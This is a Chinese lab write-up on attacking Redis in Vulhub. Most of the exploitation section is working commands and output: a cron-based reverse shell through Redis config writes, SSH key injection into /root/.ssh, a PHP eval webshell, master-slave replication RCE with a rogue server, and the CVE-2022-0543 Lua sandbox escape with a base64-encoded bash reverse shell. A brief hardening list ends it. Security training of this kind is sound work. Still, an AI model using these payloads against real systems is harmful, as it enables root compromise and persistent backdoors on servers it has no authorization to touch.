标签：Vulhub 6379 Redis redis 192.168 漏洞 io root

Vulhub 漏洞学习之：Redis

1 Redis简介

Redis 是完全开源的，遵守 BSD 协议，是一个高性能的 key-value 数据库。Redis 与其他 key - value 缓存产品有以下三个特点：

• Redis支持数据的持久化，可以将内存中的数据保存在磁盘中，重启的时候可以再次加载进行使用。
• Redis不仅仅支持简单的key-value类型的数据，同时还提供list，set，zset，hash等数据结构的存储。
• Redis支持数据的备份，即master-slave模式的数据备份。

Redis 优势

• 性能极高：Redis能读的速度是110000次/s,写的速度是81000次/s 。
• 丰富的数据类型：Redis支持二进制案例的 Strings, Lists, Hashes, Sets 及 Ordered Sets 数据类型操作。
• 原子性：Redis的所有操作都是原子性的，意思就是要么成功执行要么失败完全不执行。单个操作是原子性的。多个操作也支持事务，即原子性，通过MULTI和EXEC指令包起来。
• 丰富的特性：Redis还支持 publish/subscribe, 通知, key 过期等等特性。

2. 安装Redis

2.1 Docker安装测试环境

docker pull redis
docker run -p 6379:6379 -d redis

• -p 将容器的6379端口映射到主机的6379端口。
• -d 将容器后台运行。

2.2 安装Redis客户端

tar -zxf redis-7.0.0.tar.gz
cd redis-7.0.0
make
cp src/redis-cli /usr/bin

// 测试连接
redis-cli -h your_host -p 6379 -a "pass" --raw

• -h: 远程连接的主机
• -p: 远程连接的端口
• -a: 密码
• --raw：解决中文乱码。

2.3 Redis 基础命令

1. ping: 检测 redis 服务是否启动，启动返回PONG。

   192.168.210.13:6379> PING
   PONG
   

2. info

   192.168.210.13:6379> info 
   # Server
   redis_version:7.0.0
   redis_git_sha1:00000000
   redis_git_dirty:0
   

3 Redis 漏洞利用

3.1 利用计划任务反弹shell

3.1.1 kali 监听端口

nc -nvlp 2333

3.1.2 远程连接Redis服务器并写入反弹Payload

// 设置key
set getshell "\n* * * * * bash -i >& /dev/tcp/192.168.210.10/2333 0>&1\n"
// 设置路径
config set dir /var/spool/cron/
// 设置文件名
config set dbfilename root
// 保存key值到root文件中
save

// 命令行直接写入
echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/192.168.210.10/2333 0>&1\n\n"|redis-cli -h 192.168.210.13 -x set getshell
redis-cli -h 192.168.210.13 config set dir /var/spool/cron/
redis-cli -h 192.168.210.13 config set dbfilename root
redis-cli -h 192.168.210.13 save

3.2 利用写入公钥登录ssh

3.2.1 kali 生成公私钥

// 生成公私钥
ssh-keygen -t rsa

// 防止乱码,导出key
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > key.txt

// 导入内容
cat key.txt| redis-cli -h 192.168.210.13 -x set putsshkey

// 若知道目标Redis服务器的密码，可以加--pass参数
cat key.txt| redis-cli -h 192.168.210.13 -x set putsshkey --pass your-passwd

3.2.2 远程连接Redis服务器并写入公钥

// 设置路径
config set dir /root/.ssh
// 设置文件名
config set dbfilename authorized_keys
// 保存key值到root文件中
save

3.2.3 kali 远程登录目标系统

ssh -i id_rsa root@192.168.210.13

3.3 利用写入WEBShell连接远程服务器

3.3.1 远程连接Redis服务器并写入WEBShell

config set dir /var/www/html/
config set dbfilename webshell.php
set x '<?php @eval($_GET["cmd"]);phpinfo();?>'
save

3.4 Redis 4.x/5.x 主从复制导致的命令执行

Redis主从复制RCE漏洞存在于4.x、5.x版本中，Redis提供了主从模式，主从模式指使用一个redis作为主机，其他的作为备份机，主机从机数据都是一样的，从机只负责读，主机只负责写。在Reids 4.x之后，通过外部拓展，可以实现在redis中实现一个新的Redis命令，构造恶意.so文件。在两个Redis实例设置主从模式的时候，Redis的主机(此处为kali)实例可以通过FULLRESYNC同步文件到从机(此处为CentOS)上。然后在从机上加载恶意so文件，即可执行命令。

3.4.1 EXP 下载

1. GitHub - n0b0dyCN/redis-rogue-server: Redis(<=5.0.5) RCE
2. GitHub - Testzero-wz/Awsome-Redis-Rogue-Server: Redis-Rogue-Server Implement

3.4.2 EXP 利用过程

# python3 redis-rogue-server.py --rhost 192.168.210.13 --lhost 192.168.210.10
______         _ _      ______                         _____                          
| ___ \       | (_)     | ___ \                       /  ___|                         
| |_/ /___  __| |_ ___  | |_/ /___   __ _ _   _  ___  \ `--.  ___ _ ____   _____ _ __ 
|    // _ \/ _` | / __| |    // _ \ / _` | | | |/ _ \  `--. \/ _ \ '__\ \ / / _ \ '__|
| |\ \  __/ (_| | \__ \ | |\ \ (_) | (_| | |_| |  __/ /\__/ /  __/ |   \ V /  __/ |   
\_| \_\___|\__,_|_|___/ \_| \_\___/ \__, |\__,_|\___| \____/ \___|_|    \_/ \___|_|   
                                     __/ |                                            
                                    |___/                                             
@copyright n0b0dy @ r3kapig

[info] TARGET 192.168.210.13:6379
[info] SERVER 192.168.210.10:21000
[info] Setting master...
[info] Setting dbfilename...
[info] Loading module...
[info] Temerory cleaning up...
// Interactive shell
What do u want, [i]nteractive shell or [r]everse shell: i
[info] Interact mode start, enter "exit" to quit.
[<<] id
[>>] uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

// Reverse shell
What do u want, [i]nteractive shell or [r]everse shell: r
[info] Open reverse shell...
Reverse server address: 192.168.210.10
Reverse server port: 2333
[info] Reverse shell payload sent.
[info] Check at 192.168.210.10:2333
[info] Unload module...
// kali监听
└─$ nc -nvlp 2333
listening on [any] 2333 ...
connect to [192.168.210.10] from (UNKNOWN) [192.168.210.13] 39390
id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

3.4.3 本地利用Redis主从复制RCE

// kali
# python3 redis_rogue_server.py -v -path ../redis-rogue-server-master/exp.so 
[*] Listening on port: 15000

# nc -nvlp 2333
listening on [any] 2333 ...

// 在目标主机本地上执行以下命令：
[root@ac ~]# redis-cli 
127.0.0.1:6379> config set dir /tmp
OK
127.0.0.1:6379> CONFIG SET dbfilename exp.so
OK
127.0.0.1:6379> SLAVEOF 192.168.210.10 15000
OK
127.0.0.1:6379> module load ./exp.so
OK
127.0.0.1:6379> slaveof NO ONE
OK
127.0.0.1:6379> system.rev 192.168.210.10 2333

3.5 利用SSRF攻击Redis服务器反弹shell

ssrf漏洞利用(内网探测、打redis) - ctrl_TT豆 - 博客园 (cnblogs.com)

3.6 Redis Lua沙盒绕过命令执行（CVE-2022-0543）

Debian以及Ubuntu发行版的源在打包Redis时，不慎在Lua沙箱中遗留了一个对象package，攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数，进而逃逸沙箱执行任意命令。

3.6.1 远程执行命令

我们借助Lua沙箱中遗留的变量package的loadlib函数来加载动态链接库/usr/lib/x86_64-linux-gnu/liblua5.1.so.0里的导出函数luaopen_io。在Lua中执行这个导出函数，即可获得io库，再使用其执行命令：

local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io");
local io = io_l();
local f = io.popen("id", "r");
local res = f:read("*a");
f:close();
return res

注意：不同环境下的liblua库路径不同，你需要指定一个正确的路径。在我们Vulhub环境（Ubuntu fiocal）中，这个路径是/usr/lib/x86_64-linux-gnu/liblua5.1.so.0。

连接redis，使用eval命令执行上述脚本：

$ redis-cli -h 192.168.210.13 
192.168.210.13:6379> eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0
"uid=0(root) gid=0(root) groups=0(root)\n"

3.6.1 反弹shell

eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxMC4xMC8yMzMzIDA+JjEK |base64 -d |bash -i", "r"); local res = f:read("*a"); f:close(); return res' 0

成功反弹：

$ nc -nvlp 2333                                             
listening on [any] 2333 ...
connect to [192.168.210.10] from (UNKNOWN) [192.168.210.13] 57516
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@6d4a5a7a8313:/var/lib/redis# id
id
uid=0(root) gid=0(root) groups=0(root)
root@6d4a5a7a8313:/var/lib/redis# 

4 redis安全配置

1. 以普通账号启动redis服务
2. 监听本地或特定主机
3. 开启 protected-mode
4. 更改默认6379端口
5. 为redis设置密码

标签：Vulhub,6379,Redis,redis,192.168,漏洞,io,root
来源： https://www.cnblogs.com/f-carey/p/16305107.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。